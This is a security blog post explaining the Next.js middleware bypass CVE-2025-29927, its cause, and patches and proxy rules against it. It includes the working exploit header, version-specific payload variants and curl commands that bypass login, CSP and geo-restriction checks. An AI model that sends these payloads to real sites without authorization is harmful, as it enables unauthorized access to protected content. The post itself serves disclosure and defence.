Best of 2025: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability
When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what’s happening with a newly discovered vulnerability in Next.js – one of the most widely used React frameworks today.
Let's break down this surprisingly simple but dangerous security flaw.

What Makes This Vulnerability So Dangerous?

Imagine building a house with a sophisticated security system, but accidentally installing a secret button that disables all the alarms at once. That's essentially what happened with Next.js.

The vulnerability (officially CVE-2025-29927) affects Next.js versions 11.1.4 through 15.2.2, which means years' worth of websites are potentially vulnerable.

Here's the shocking part: all it takes to bypass security is adding a single HTTP header to your request:

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Add this to any request and, on a vulnerable version, every check implemented in Next.js middleware is skipped. No login needed. No security barriers. Nothing. (Checks that live elsewhere, in server components, route handlers or API routes, still run; the damage is exactly as large as your reliance on middleware.)

Understanding Next.js Middleware

To understand why this works, we need to know a bit about middleware.

Next.js middleware acts like a security guard that checks visitors before they reach your actual website content. It runs before any page loads and can:

- Check if users are logged in
- Block visitors from certain countries
- Add security headers to prevent attacks
- Redirect users to different pages

About 15% of React applications use Next.js, and many rely on middleware for their core security.

How The Bug Actually Works

The problem stems from a mechanism designed to prevent infinite loops.
Next.js needed a way to stop middleware from calling itself endlessly, so the developers added a counter. Here's what happens:

- Every time middleware runs, Next.js checks a special request header called x-middleware-subrequest
- The header lists the middleware names already visited, so it doubles as a count of how many times middleware has run
- If it has run too many times (5 by default), Next.js skips the middleware entirely
- The critical flaw: the header is read straight from the incoming request, so anyone can set it themselves

Looking at the actual code makes it clearer:

// From Next.js's source code (simplified)
const subrequests = request.headers.get('x-middleware-subrequest')?.split(':') || [];
const depth = subrequests.filter(s => s === middlewareName).length;
if (depth >= MAX_RECURSION_DEPTH) {
  return NextResponse.next(); // Skip all middleware!
}

The middlewareName is the path of your middleware file without its extension, usually middleware or src/middleware depending on your project setup. By repeating this name in the header five times, an attacker tricks Next.js into thinking middleware has already recursed to the limit, and the guard that was meant to stop infinite loops instead switches the middleware off for that request.

Testing For This Vulnerability

Anyone can verify whether a Next.js application is vulnerable using a deliberately vulnerable test application created for this purpose: https://github.com/strobes-security/nextjs-vulnerable-app

The testing process works like this:

1. Clone the repository:
git clone https://github.com/strobes-security/nextjs-vulnerable-app

2. Install dependencies and start the app:
npm install && npm run dev

3. Try accessing the /dashboard page (in a browser, or with curl -v http://localhost:3000/dashboard): you'll be redirected to the login page.

4. Now try with the special header:
curl -v -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/dashboard

Suddenly, the dashboard appears without any login. The security is completely bypassed. In the curl output, compare the status lines: the unauthenticated request answers with a redirect (a 3xx status and a Location: /login header), while the request carrying the bypass header answers 200 OK with the dashboard HTML.

Different Project Structures Need Different Payloads

The exact header value changes depending on where the middleware file lives and on which Next.js version is in use: the name that has to appear in the header is derived from the file path, and older releases only looked for the name's presence rather than counting it.

Pages Router (versions 11.1.4-12.1.x), middleware at pages/_middleware:
x-middleware-subrequest: pages/_middleware

Root middleware file (versions 12.2.x-13.x), middleware.ts at the project root:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Middleware under /src (versions 14.x-15.2.2), src/middleware.ts:
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

What matters is the file location, not the router in use: a root-level middleware.ts on 14.x or 15.x still uses the plain middleware name. Repeating the name five times also satisfies the older presence-only check, so the five-fold value is the right thing to try first; if it fails, try the src/ variant before concluding an app is patched.

Real-World Security Impacts

This vulnerability opens several serious attack paths:

Complete Authentication Bypass
Attackers can access admin panels, private dashboards, or user data without logging in, wherever the middleware is the only gate in front of those pages.

Content Security Policy Bypass
Middleware often sets CSP headers that mitigate cross-site scripting. When the middleware is skipped, the response goes out without them. You can see this by comparing response headers with and without the bypass header:

curl -s -D - -o /dev/null http://example-site.com/ | grep -i content-security-policy
curl -s -D - -o /dev/null -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://example-site.com/ | grep -i content-security-policy

If the first command prints a policy and the second prints nothing, the CSP depends entirely on the middleware. The header does not inject a script by itself; it removes the safety net that would have stopped an existing XSS from executing.

Geographic Restrictions Bypass
Many sites use middleware to restrict content by location.
This header bypasses those checks:

curl -v -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://example-site.com/eu-only-content

Because the middleware never runs, it never reads the visitor's country (whether from a CDN header such as Cloudflare's CF-IPCountry or from the request IP), so the restriction is simply not applied. There is no need to spoof the country header.

Protecting Your Next.js Applications

There are three main ways to fix this vulnerability:

Update Next.js Immediately
Upgrade to version 15.2.3+ or 14.2.25+. These versions have patched the security hole. Backported fixes for the older lines were published as 13.5.9 and 12.3.5; if you are on those lines, move to those releases.

Block The Dangerous Header
If updating isn't possible right away, strip the header at the web server or reverse proxy level so it never reaches Next.js:

For NGINX (an empty value makes nginx drop the header before proxying):
location / {
    proxy_set_header x-middleware-subrequest "";
    proxy_pass http://127.0.0.1:3000;  # your existing upstream
}

For Apache:
RequestHeader unset x-middleware-subrequest

This only helps if every path to the Next.js server goes through that proxy: a client that can reach the Node process directly can still send the header. Hosting platforms that proxy traffic in front of Next.js may strip it for you, but verify that rather than assuming it; self-hosted deployments have to do it themselves.

Implement Defense-in-Depth
- Don't rely solely on middleware for security
- Repeat the authentication and authorization check where the data is actually served: in server components, route handlers, API routes and getServerSideProps (for example by validating the session with NextAuth.js there, not only in middleware)
- For critical paths, add redundant security layers

Key Security Lessons From This Vulnerability

This bug teaches three fundamental security principles:

Security Needs Multiple Layers
Like an onion or a castle with multiple walls, security should have fallback layers. If middleware fails, other security checks should still protect your application.

Never Trust User-Controlled Input
Any data from users, including HTTP headers, can be manipulated. A header the framework uses for its own internal bookkeeping must not be accepted from the outside world without proof that it originated inside the system.

Simple Bugs Can Cause Major Problems
This vulnerability wasn't complex. It was a simple oversight in how a counter worked. Yet it put thousands of applications at risk.

Checking Your Own Applications

If you run Next.js applications, take these steps immediately:

1. Test your applications with the exploit payloads listed above
2. Review all middleware configurations for security dependencies
3. Update to the latest version as soon as possible

For more technical details, refer to:

Why Web Security Is Always Evolving

This vulnerability reminds us that security is never "done." It's an ongoing process. Even popular, well-maintained frameworks can have critical flaws discovered years after release.

The good news? The Next.js team responded quickly with patches. But this incident serves as a powerful reminder that we need to stay vigilant, keep our dependencies updated, and always implement multiple layers of security.

Have you checked your Next.js applications yet? The fix is simple, but only if you apply it.

The post CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability appeared first on Strobes Security.
